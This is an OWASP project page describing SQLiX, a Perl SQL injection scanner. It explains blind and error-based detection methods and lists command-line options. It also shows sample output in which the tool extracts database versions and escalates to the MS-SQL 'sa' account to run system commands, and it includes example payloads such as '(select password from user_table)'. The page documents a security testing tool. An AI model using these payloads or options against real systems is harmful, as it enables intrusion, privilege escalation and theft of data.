Category:OWASP SQLiX Project
SQLiX, coded in Perl, is able to crawl, find SQL injection vectors, identify the back end database and grab function call/UDF results (even execute system commands for MS-SQL). The concepts in use are different than the one used in other SQL injection scanners. SQLiX is able to find normal and blind SQL injection vectors and doesn't need to reverse engineer the original SQL request (using only function calls).
SQLiX is a SQL Injection scanner which attempts to fill the gap between what commercial software available on the market can do and what can really be done to detect and identify SQL injection.
Current injection methods used by commercial web assessment software are based on error generation or statement injections.
The error generation method is quite simple and is based on meta characters like single quotes or double quotes. By injecting these characters in the original SQL request, you generate a syntax error which could result in an SQL error message displayed in the HTTP reply. The main issue with this technique is the fact that it's only based on pattern matching. There is no way to handle multiple languages or complex behaviors when the error message is filtered by the server-side scripts.
The second method used is statement injection. Let's look at an example:
The target URL
The scanner will try to compare the HTML content of the original request with the HTML content of
(1) http://target.example.com/news.php?id=25%20or%201=1 (2) http://target.example.com/news.php?id=25%20or%201=0
If the request (1) provides the same result as request (0) and request (2) doesn't, the scanner will conclude that SQL injection is possible. This method works fine, but is very limited by the syntax of the original request. If the original request contains parentheses, store procedures or function calls, this method will rarely work. Worse, if the variable is used by multiple SQL requests, all with different syntaxes, there is no automatic way to make them all work simultaneously.
Frequently you will see more advanced scanners like SQLBrute from www.justinclarke.com trying to reverse engineer the original SQL syntax by injecting multiple requests with different sets of parentheses or comas. This method is a little more time consuming but does provide better results (for free), especially when error messages are not displayed.
Another global issue concerning SQL injection is the fact that pen testers frequently conclude that a given SQL injection vulnerability can't be exploited. By concluding this incorrect statement they are inviting their customers to not patch the vulnerability.
How could SQLiX help to fill the gap?
- SQLiX uses multiple techniques to determine if the current server-side script is vulnerable to SQL Injection
- conditional errors injection
- blind injection based on integers, strings or statements
- MS-SQL verbose error messages ("taggy" method)
- SQLiX using UDF (User defined functions) or function calls thus no need to reverse engineer the original SQL syntax
- SQLix is able identify the database version and gather sensitive information for the following SQL servers: MS-Access, MS-SQL, MySQL, Oracle and PostgreSQL.
- The comparison module of SQLiX is able to deal with complex HTML contents even when they include dynamic ads
- SQLiX contains an exploit module to demonstrate how a hacker could exploit the found SQL injection to gather sensitive information
OWASP SQLiX v1.0 is available for download here.
Command line usage
Usage: SQLiX.pl [options]
-help Show this help
-url [URL] Scan a given URL. Example: -url="http://target.com/index.php?id=1" --post_content [CONTENT] Add a content to the current [URL] and change the HTTP method to POST -file [FILE_NAME] Scan a list of URI provided via a flat file. Example: -file="./crawling" -crawl [ROOT_URL] Scan a web site from the given root URL. Example: -crawl="http://target.com/"
-referer Use HTTP referer as a potential injection vector. -agent Use HTTP User agent as a potential injection vector. -cookie [COOKIE] Use the cookie as a potential injection vector. Cookie value has to be specified and the injection area tagged as "--INJECT_HERE--". Example: -cookie="userID=--INJECT_HERE--"
-all Use all the injection methods. -method_taggy Use MS-SQL "verbose" error messages method. -method_error Use conditional error messages injection method. -method_blind Use all blind injection methods. -method_blind_integer Use integer blind injection method. -method_blind_string Use string blind injection method. -method_blind_statement Use statement blind injection method. -method_blind_comment Use MySQL comment blind injection method.
-exploit Exploit the found injection to extract information. by default the version of the database will be retrieved -function [function] Used with exploit to retrieve a given function value. Example: -function="system_user" Example: -function="(select password from user_table)" -union Analyse target for potential UNION attack [MS-SQL only].
MS-SQL System command injection:
-cmd [COMMAND] System command to be executed. Example: -cmd="dir c:\\" -login [LOGIN] MS-SQL login to use if known. -password [PASSWORD] MS-SQL password to use if known.
-v=[n] Verbose mode level v=0 => no output, only results are displayed at the end v=2 => realtime display, provide minimum result info v=5 => debug view [all url,content and headers are displayed]
Output example: MS-SQL System command execution
$ perl SQLiX.pl -file crawling -all -v=2 -exploit -cmd="dir c:\\"
====================================================== -- SQLiX -- © Copyright 2006 Cedric COCHIN, All Rights Reserved. ====================================================== Analysing URI obtained by flat file [crawling] http://www.target.example.com/DocumentDescription-HR.asp?DocID=2 [+] working on DocID [+] Method: MS-SQL error message [FOUND] MS-SQL error message (implicite without quotes) [FOUND] function [@@version]: Microsoft SQL Server 2000 - 8.00.534 (Intel X86) Nov 19 2001 13:23:50 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4) [INFO] System command injector: [INFO] Current database: HR [INFO] We are not sysadmin for now [INFO] Checking OpenRowSet availibility - please wait... [INFO] Current user login: [HR] [FOUND] OPENROWSET available - (login [sa] | password [sa]) [INFO] Privilege escalation - from [HR] to [sa] =========================================================================== Volume in drive C has no label. Volume Serial Number is 00BC-6F73 Directory of c:\ 11/21/2005 06:36p <DIR> 403679d1f6ca54e5384256556434111d 07/14/2006 10:49a <DIR> Documents and Settings 07/22/2005 02:21p <DIR> honeypot 07/21/2005 04:38p <DIR> iDefense 03/08/2002 08:23a <DIR> Inetpub 07/14/2006 03:21p <DIR> Program Files 08/07/2006 04:11p 622 tmp.txt 11/28/2005 06:06p <DIR> WINNT 1 File(s) 622 bytes 7 Dir(s) 183,328,768 bytes free =========================================================================== [FOUND] MS-SQL error message RESULTS: The variable [DocID] from [ http://www.target.example.com/DocumentDescription-HR.asp?DocID=2 ] ... ... is vulnerable to SQL Injection [TAG implicite without quotes - MSSQL].
Output example: MySQL, PostgreSQL function Injection
$ perl SQLiX.pl -file crawling -all -v=2 -exploit
====================================================== -- SQLiX -- © Copyright 2006 Cedric COCHIN, All Rights Reserved. ====================================================== Analysing URI obtained by flat file [crawling] http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2 [+] working on DocID [+] Method: MS-SQL error message [+] Method: SQL error message [FOUND] Match found INPUT:[user] - "Microsoft OLE DB Provider for ODBC Drivers" [INFO] Error without quote [INFO] Database identified: MySQL Server [INFO] Current function: version() [INFO] length: 19 4.1.20-community-nt [FOUND] SQL error message http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2 [+] working on DocID [+] Method: MS-SQL error message [+] Method: SQL error message [FOUND] Match found INPUT:['] - "Microsoft OLE DB Provider for ODBC Drivers" [INFO] Error without quote [INFO] Database identified: PostgreSQL Server [INFO] Current function: version() [INFO] length: 88 PostgreSQL 8.0.7 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special) [FOUND] SQL error message RESULTS: The variable [DocID] from [ http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2 ] ... ... is vulnerable to SQL Injection [Error message (user) - MySQL]. The variable [DocID] from [ http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2 ] ... ... is vulnerable to SQL Injection [Error message (') - PostgreSQL].
Currently working on a module able to dump the database schema and the data of the vulnerable database.
PS: If you are a real Perl developer (not like me ;) ), feel free to provide code improvement or advice.
OWASP SQLiX Project Created! - 09:45, 28 August 2006 (EDT)
While the SQLiX Project has been under development for some time now, it has only recently been donated to OWASP.
The OWASP community would like to thank Cedric Cochin for the generous donation.
The project is lead by Cedric Cochin (cedric.cochin at gmail dot com)
If you would like to help SQLiX project developement, feel free to contact the project leader.
This category has only the following subcategory.
- ► OWASP SQLiX Project Roadmap (empty)